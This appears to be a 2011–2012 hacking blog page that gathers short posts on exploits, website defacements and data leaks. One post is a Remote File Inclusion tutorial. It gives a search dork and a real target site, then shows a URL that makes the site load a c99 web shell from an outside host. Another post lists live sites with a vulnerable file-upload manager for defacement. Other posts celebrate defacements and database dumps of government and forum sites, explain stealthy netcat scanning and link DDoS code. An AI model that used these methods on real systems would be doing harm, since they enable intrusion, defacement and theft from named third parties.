Showing posts with label exploit. Show all posts
Showing posts with label exploit. Show all posts

Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploit

Friday, March 16, 2012 // by Hacking Beast Editor // Labels: , , , , , // 0 comments
#Title: Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)
#Author: Sandeep Kamble
#Risk Factor: Low (Why low please read below)
#Attack Type: A User can access B User account Link to remove secondary E-mail address
#Reported Date: OCT 21 , 2011


Overview: 

In Google account setting page, when you reset Google account password, it send Reset Password link to your secondary email address. Into that mail there is one more link which can be used remove your secondary email address. 

Vulnerability Description: 

This Vulnerability can be used to remove secondary email address. In this vulnerability we needed to guess ?C variable token to access the any users account link that can be used to remove secondary email address ?C variable token is generating at sever side so that it is not possible to guess this token and so that it can be performed at victim side only. (Self Exploitation)

Vulnerable Link 

https://www.google.com/accounts/Acco...z_7p8Z4B&hl=en
Link it has two options, one option is to remove the Secondary and one option to negated email removing operation. 
The above like is accessible to everyone. We cannot generate the token number so we can find the token using 

Google Dork: Inurul : /AccountDisavow?c=

If you click on the radio button, “No, I didn't create *******@gmail.com - remove my email address, ********@yahoo.com, from this Google Account. “ and then click continue it will remove the email and delete the link token. 
This link will be dead, No one can access it again !

But if you click on the,” Yes, *******@gmail.com is my Google Account. ” and press continue. 
When u Click on the this radio button the token is not getting deleted, so that may be pages are indexed into Google 

Proof of Concept 




Source : Here



 The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Upload shell to joomal easy way

Saturday, February 18, 2012 // by Hacking Beast Editor // Labels: , , , , , , , , , // 0 comments
I was just searching for some good exploits and i come to this one when i saw this tutorial i was quite impressed it is a easy tutorials and i am sure new people in this feild will surely like this tutorial. 




This tutorial is not owned by the Hacking Beast we are just publishing this video on our websites so that it can reach to more people by our platform.

 The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

Monday, February 13, 2012 // by Hacking Beast Editor // Labels: , , // 0 comments






In WordPress Plugin we can Upload our Animation Deface using this Vulnerability..
Asset manager is plugin that give you Remot File upload…
Folow the steps and learn how to do…:)
  • Go to Google and Copy Paste the Dork below

inurl:Editor/assetmanager/assetmanager.asp
Google Will show you hug of web sites…
Open any one you want..
There is some sites for Test:
  • http://www.pols.nl/Editor/assetmanager/assetmanager.asp
  • http://www.wsvh2o.nl/Editor/assetmanager/assetmanager.asp
  • http://egypt-hosts.com/Editor/assetmanager/assetmanager.asp




 The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Remote File Inclusion exploit

Tuesday, February 7, 2012 // by Hacking Beast Editor // Labels: , , , , , // 0 comments
Well we got few emails from our readers, they wanted to learn a easy way of hack a website using shell. So this article is for those persons who are new to this field. This a very simple technique you just need to use your brain.

Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one
www.Targetsite.com/index.php?page=Anything
To find the vulnerability the hacker will most commonly  use the following Google Dork
“inurl:index.php?page=”
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com
Lets say that the target website is http://www.cbspk.com
So the hacker url will become
http://www.cbspk.com/v2/index.php?page=http://www.google.com
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is
http://h1.ripway.com/XXX.txt
Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/XXX/c99.txt?
Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it
This post was give to us by our team member we thanks him for his contribution.
Mohit Sharma.
Mohitsharma45@yahoo.com


 The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Janta Party website owned !

Saturday, February 4, 2012 // by Hacking Beast Editor // Labels: , , , // 0 comments
Janta Party Hacked



The Janata Party is a child of the most epoch-making stuggle in the history of Indian democracy. In March 1977 the people of India, under the inspiring leadership of Jayaprakash Narayanan, elected the Janata Party to power and entrusted it with the task of restoring democracy and freedom to the people and constructing an egalitarian and decentralised social order based on the Gandhian perspective. In this perspective political and economic tasks involve a common, approach, that of providing the people themselves, above all to the poor and deprived among them, both the opportunity and the power to shape their own lives and destiny.
In the first Election manifesto (1977), the Janata Party, had declared: "The Janata Party is dedicated to the values and ideals of Gandhiji. It is dedicated to the task of building a democratic state in India, drawing inspiration from our rich heritage, and the noble traditions of our struggle for independence". In other words, the Janata Party's ideology is to foster democracy in all its dimensions, economic, political, social and cultural. This has to be done by learning from our ancient history and the Freedom struggle; within the Gandhian framework."
The Janata Party was ushered in to power in 1977 on the strength of the youth (who constitute over seventy percent of the electorate). However, this mandate of the youth was soon betrayed through splits and defections in the 1980's, but it is still alive and kicking today. The mission of the Party, given to it by JP, is still unaccomplished and yet relevant. Those of us who have remained steadfast and suffered the wilderness for it, have kept this historic Party alive. In 1977, the nation's democratic structure was under siege and the nation was in crisis. Today, the nation is on the throes of deep identity crisis and ideological bankruptcy. At the cross roads of history today, the future of our country is crucially dependent on making the right choice on the direction for the country. While the Freedom struggle had given the people a clear identity and the underpinning of its ideology, the last one and a half decades have thrown up anti-national and anti-social forces which now seriously threaten our national integrity, and have sown doubts in the people's mind about the nation's future. No political party has come forward to provide an answer.
The political parties of today have in fact failed so far to formulate a concept of our identity and relevant ideology. The continued inability of political parties to formulate an acceptable concept of identity and ideology is dangerous for our democracy. No wonder, our people are confused about the future, and the youth led astray. If this continues, the ensuing disorder may threaten the collapse of the Indian Union, which, in the Soviet Union and elsewhere has become a reality. But still no political party today is thinking along these futuristic terms. The Congress Party of today cannot provide the frame work for our identity and ideology. There is a wide gap between policy and practice in the Congress Party. With the collapse of Communist rule in the erstwhile Soviet Union and Eastern Europe, the ideology of the Communists stands discredited.
All the leftist parties like the CPI, CPI(M), Marxist, Leninist Groups and the other constituents of the United Front like Janata Dal, Samajvadi Party etc. and above all the Congress Party by passionately advocating the cause of State controlled socialism until recently have only laid solid foundations for raising a superstructure of mega Corruption which has only lured hundreds of Criminals and anti-social elements into the noble arena of politics and public life.
Janata Party is pledged to the establishment of minimum government and maximum welfare for all. Janata Party stands for social justice and removal of disparities of opportunity and equitably distributed welfare. Statism is not the road to socialism. It is the way to authoritarianism at the top and serfdom at the bottom. Janata Party wants to create a society with a political government powerful in its legitimate domain and minimal elsewhere, a government that governs but does not dabble in business, arts, media, justice, religion and piety.
Drawing on the inspiration of Jayaprakash Narayanan, with adherence to the moral edicts of Mahatma Gandhi, the 'darshan' of Swami Vivekananda and Sri Aurobindo, the poetry of Iqbal and Subramania Bharathi, the patriotic fervor of Bankim Chatterjee, the courage and conviction of Mahatma Phule and Dr. Ambedkar, the Janata Party rededicates itself to a virile concept of national, identity and a nationalist ideology embodied in an implementable Agenda. This is the Janata Party's Agenda for National Renaissance, representing the ideological framework of the party.





Hacked Link : http://www.janataparty.org/pressdetail.asp?rowid=104
Mirror Link : http://arab-zone.net/mirror/89478/janataparty.org/pressdetail.asp?rowid=104



The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

BMW Motorcycle Owners of America Hacked And thousands of Accounts Leaked By xdev @b4lc4nh4ck

Thursday, February 2, 2012 // by Hacking Beast Editor // Labels: , , , // 0 comments


xdev who is part of @ has hacked and dumped a few a heap of accounts from a bmwmoa.org, BMW Motorcycle Owners of America forums. The leak contains 2000+ accounts with this just being a small part of the full 43000 from the vBulletin based forums.
the leaked data is in the format of username, emails and paswords which are encrypted.
www.bmwmoa.org forums pwned by xdev @ b4lc4nh4ck [ greetz to Don @ b4lc4nh4ck ]
- 43000 users(vbulletin) (here is only 2100 users dump, soon more)
- Follow us on Twitter @ (just wait for our tweet to know more about our works)

The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

NUTS strike once again on pakistan !!

Wednesday, February 1, 2012 // by Hacking Beast Editor // Labels: , , , , // 0 comments
Team NUTS a group of professional  hackers strikes including Pak Consumer and other high reputed websites  Pakistan websites again.




Here is a list that was submitted to us by the team.
http://www.mozaikglocal.com/
http://mtbryk.com/
http://www.archlogics.com/
http://rpgroup.com.pk/
http://www.libertypharmaceuticals.com/
http://depression-guide.org/
http://pakconsumer.com/
http://www.bmun.org.pk/
http://www.autismpak.com/
http://uniquesplasticsurgery.com/



The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Scan Open Ports/Services of Target: Netcat

Monday, September 5, 2011 // by Hacking Beast Editor // Labels: , , , , // 0 comments

Prerequisites: None 

Countermeasures: Uninstall/disable fix unnecessary services, Intrusion
Detection Systems (IDS) Log and Event Log review 

Description: The netcat application has many uses; one is the ability to
scan a target for open ports and services. Another utility, cryptcat, is
almost identical except that it operates with encryption.
Procedure: From a DOS prompt, type the following with the syntax of:
nc 



_ The –v option instructs netcat to run in verbose mode, allowing you
to see the progress of the scan.
_ The –r option instructs netcat to randomize local and remote ports in
an attempt to elude any intrusion detection systems.
_ The –w2 option instructs netcat to wait 2 seconds between each port
scanned to help elude any intrusion detection systems.
_ The –z option instructs netcat to operate in a zero-I/O (Input/Output)
mode. It is best to use the –z when scanning with netcat.
_ The 1-1024 instructs netcat to scan port 1-1024.
In this example, the target has the following ports open:
_ 80 (Web)
_ 7 (Echo)
_ 13 (daytime)
_ 21 (FTP)
_ 17 (Quote of the Day)
_ 445 (Windows Share)
_ 9 (discard)
_ 139 (Windows Share)
_ 19 (Character Generator)
_ 135 (epmap)
_ 443 (HTTPS)
_ 25 (Simple Mail Transfer Protocol [SMTP])
Note: From the results of this example the “low hanging fruit” ports are:
_ 7, 13, 17, 9, and 19 as these ports can easily be used to create a Denial of Service (DoS). These ports should not be open to the Internet.

The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

TEAM T!g3R attack and hack 7 Sri Lanka Government websites, including the army

Sunday, September 4, 2011 // by Hacking Beast Editor // Labels: , , , , , // 0 comments


Earlier today TEAM T!g3R dumped a few databases and with images and information from a bunch of Sri Lanka government websites.
These sites are the army, micro finance, lawnet, nsf, Port authority, Business Online, Sunday times. This shows the range of sites that hackers will go for, pretty much anything that has a exploit or entry point for a hacker to do damage and leave there mark.
Also @CMDL1NE has hacked and leaked the database for Oldpcgames.co.kr.

The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Bangladesh Ministry of Home Affairs hacked by TEAM T!g3R

Thursday, September 1, 2011 // by Hacking Beast Editor // Labels: , , , , , // 0 comments

TEAM T!g3R  has now again come to their works and they have just hacked a goverment site and leaked its info on WWW  

This time the victim is Bangladesh Ministery of home affairs 
Other info : http://pastebin.com/u/w3bd3f4c3r
                    http://pastebin.com/FUbVYBhs




                                                                                                        

The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!

Hackers can use Google+ servers to make DDos attack on ANY website!

Tuesday, August 30, 2011 // by Hacking Beast Editor // Labels: , , , , , , , , , , , // 0 comments


























A new security hole has been discovered on the Google+ servers that would allow potential hackers to make DDos using Google’s Bandwidth.
Google+ has been under testing for quite sometime now and a tester at an Italian Security firm has reported that the Google+ servers can be used to make DDos requests to other websites.
The original sighting of this reports can be seen at IHTeam Security Blog by Simone Quatrini. He demonstrates how users can make use of Google’s server to act as a proxy and fetch content of any desired website. It is also noted that Google’s servers are more anonymous than other servers.
Here is the video for the news : 

To Download the DDoS Source Code  Here




The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!